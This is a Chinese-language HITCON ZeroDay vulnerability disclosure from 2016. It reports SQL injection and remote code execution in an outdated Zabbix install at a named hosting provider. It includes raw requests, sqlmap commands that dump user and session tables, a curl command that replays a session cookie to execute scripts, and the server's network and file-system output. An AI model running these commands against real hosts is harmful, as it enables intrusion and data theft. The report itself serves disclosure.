OO 主機代管商多個漏洞導致 RCE - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2016-00030
  • Vendor: 雅富科技網路有限公司
  • Title: OO 主機代管商多個漏洞導致 RCE
  • Introduction: Zabbix 老版本的漏洞有很多, 請即時更新到最新版

處理狀態

目前狀態

公開
Last Update : 2016/04/15
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2016/01/30 13:42:47 : 新提交 (由 [email protected] 更新此狀態)
  • 2016/02/01 03:13:25 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/02/23 00:00:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2016/04/15 18:55:20 : 公開 (由 HITCON ZeroDay 服務團隊 更新此狀態)

詳細資料

  • ZDID:ZD-2016-00030
  • 通報者:chris ([email protected])
  • 風險:嚴重
  • 類型:使用含已知漏洞之元件 (Using Known Vulnerable Components)

參考資料

系統使用已存在漏洞的元件,攻擊者可以利用該漏洞執行惡意指令,甚至操控系統。

漏洞說明: OWASP - Top 10 - 2017 A9 - Using Components with Known Vulnerabilities
https://www.owasp.org/index.php/Top_10-2017_A9-Using_Components_with_Known_Vulnerabilities
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

敘述

1 隱碼攻擊

漏洞位置: Monitoring > Web

網頁請求:
GET /httpmon.php?applications=1' HTTP/1.1
Host: mon.nicevps.com
Connection: close

網頁回應:
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2016 02:59:06 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: zbx_sessionid=1193945426543ca89302e4ff6311b669; expires=Tue, 01-Mar-2016 02:59:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11157

<!doctype html>
<html>
<head>
<title>mon: Status of Web monitoring [refreshed every 30 sec]</title>
<略>
</head>
<body class="originalblue">
<略>
<table class="msgerr" cellpadding="0" cellspacing="0" id="msg_messages" style="width: 100%;">
<tr class="">
<td class="msg" colspan="1">
<ul class="messages">
<li class="error">pg_query(): Query failed: ERROR: unterminated quoted string at or near "', 1)"
LINE 1: ...id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)
^ [include/db.inc.php:500]</li>
<li class="error">Error in query [INSERT INTO profiles (profileid, userid, idx, value_id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)] [ERROR: unterminated quoted string at or near "', 1)"
LINE 1: ...id, type) VALUES (421, 2, 'web.httpmon.applications', 1', 1)
^]</li>
</ul>
</td>
</tr>
</table>
<略>
</body>
</html>

測試語法:
sqlmap -u "http://mon.nicevps.com/httpmon.php?applications=1" -p "applications" -o -v 0 --flush-session --random-agent --threads 10 --banner --current-db --current-user --is-dba
sqlmap -u "http://mon.nicevps.com/httpmon.php?applications=1" -p "applications" -o -v 0 -D "public" -T "sessions,users" --dump --start 1 --stop 5

2 代碼執行

漏洞位置: Administration> Scripts

網頁請求:
GET /scripts_exec.php?execute=1&hostid=11269&scriptid=8&sid=909e3fe235f13323 HTTP/1.1
Host: mon.nicevps.com
Cookie: zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323
Connection: close

網頁回應:
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2016 04:42:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Set-Cookie: zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323; expires=Tue, 01-Mar-2016 04:42:16 GMT
Content-Length: 5824
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>mon: Scripts</title>
<略>
</head>
<body class="originalblue">
<div id="message-global-wrap">
<div id="message-global"></div>
</div>
<div class="">
<div class="w" id="widget_6744">
<form class="" method="post" action="scripts_exec.php" accept-charset="utf-8" name="scriptForm">
<略>
<span class="pre">Linux mon.nicevps.com 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64 x86_64 x86_64 GNU/Linux
mon.nicevps.com
zabbix
61-219-193-228.HINET-IP.hinet.net (61.219.193.228) at <incomplete> on eth0
61-219-193-251.HINET-IP.hinet.net (61.219.193.251) at 00:1b:21:88:97:ab [ether] on eth0
61-219-193-237.HINET-IP.hinet.net (61.219.193.237) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-246.HINET-IP.hinet.net (61.219.193.246) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-245.HINET-IP.hinet.net (61.219.193.245) at <incomplete> on eth0
61-219-193-235.HINET-IP.hinet.net (61.219.193.235) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-249.HINET-IP.hinet.net (61.219.193.249) at <incomplete> on eth0
61-219-193-225.HINET-IP.hinet.net (61.219.193.225) at 00:30:88:db:c1:e1 [ether] on eth0
61-219-193-233.HINET-IP.hinet.net (61.219.193.233) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-242.HINET-IP.hinet.net (61.219.193.242) at <incomplete> on eth0
61-219-193-241.HINET-IP.hinet.net (61.219.193.241) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-229.HINET-IP.hinet.net (61.219.193.229) at <incomplete> on eth0
61-219-193-240.HINET-IP.hinet.net (61.219.193.240) at <incomplete> on eth0
61-219-193-239.HINET-IP.hinet.net (61.219.193.239) at <incomplete> on eth0
61-219-193-231.HINET-IP.hinet.net (61.219.193.231) at 0c:c4:7a:40:28:79 [ether] on eth0
61-219-193-252.HINET-IP.hinet.net (61.219.193.252) at fc:aa:14:50:3f:e4 [ether] on eth0
61-219-193-230.HINET-IP.hinet.net (61.219.193.230) at <incomplete> on eth0
61-219-193-250.HINET-IP.hinet.net (61.219.193.250) at 00:10:18:1a:60:df [ether] on eth0
61-219-193-253.HINET-IP.hinet.net (61.219.193.253) at 8a:c1:8e:9e:28:42 [ether] on eth0
61-219-193-227.HINET-IP.hinet.net (61.219.193.227) at <incomplete> on eth0
61-219-193-254.HINET-IP.hinet.net (61.219.193.254) at <incomplete> on eth0
61-219-193-243.HINET-IP.hinet.net (61.219.193.243) at 8c:89:a5:89:b5:72 [ether] on eth0
61-219-193-238.HINET-IP.hinet.net (61.219.193.238) at 8a:c1:8e:9e:28:42 [ether] on eth0
61-219-193-232.HINET-IP.hinet.net (61.219.193.232) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-236.HINET-IP.hinet.net (61.219.193.236) at 00:11:95:84:78:52 [ether] on eth0
61-219-193-247.HINET-IP.hinet.net (61.219.193.247) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-244.HINET-IP.hinet.net (61.219.193.244) at <incomplete> on eth0
61-219-193-248.HINET-IP.hinet.net (61.219.193.248) at 00:24:1d:17:df:ff [ether] on eth0
61-219-193-234.HINET-IP.hinet.net (61.219.193.234) at 00:11:95:84:78:52 [ether] on eth0
eth0 Link encap:Ethernet HWaddr 8C:73:6E:B7:60:37
inet addr:61.219.193.226 Bcast:61.219.193.255 Mask:255.255.255.224
inet6 addr: fe80::8e73:6eff:feb7:6037/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:171069323 errors:0 dropped:0 overruns:0 frame:0
TX packets:304383318 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:18069164601 (16.8 GiB) TX bytes:36693826183 (34.1 GiB)
Interrupt:32 Base address:0xa000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2026774943 errors:0 dropped:0 overruns:0 frame:0
TX packets:2026774943 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:705159124500 (656.7 GiB) TX bytes:705159124500 (656.7 GiB)
bin dev home lib64 media opt root selinux sys usr
boot etc lib lost+found mnt proc sbin srv tmp var</span>
</div>
</div>
</form>
</div>
</div>
<略>
</body>
</html>

測試語法:
curl --cookie "zbx_sessionid=bfd4a8e3265b09fe909e3fe235f13323" "http://mon.nicevps.com/scripts_exec.php?execute=1&hostid=11269&scriptid=8&sid=909e3fe235f13323"

擷圖

留言討論

;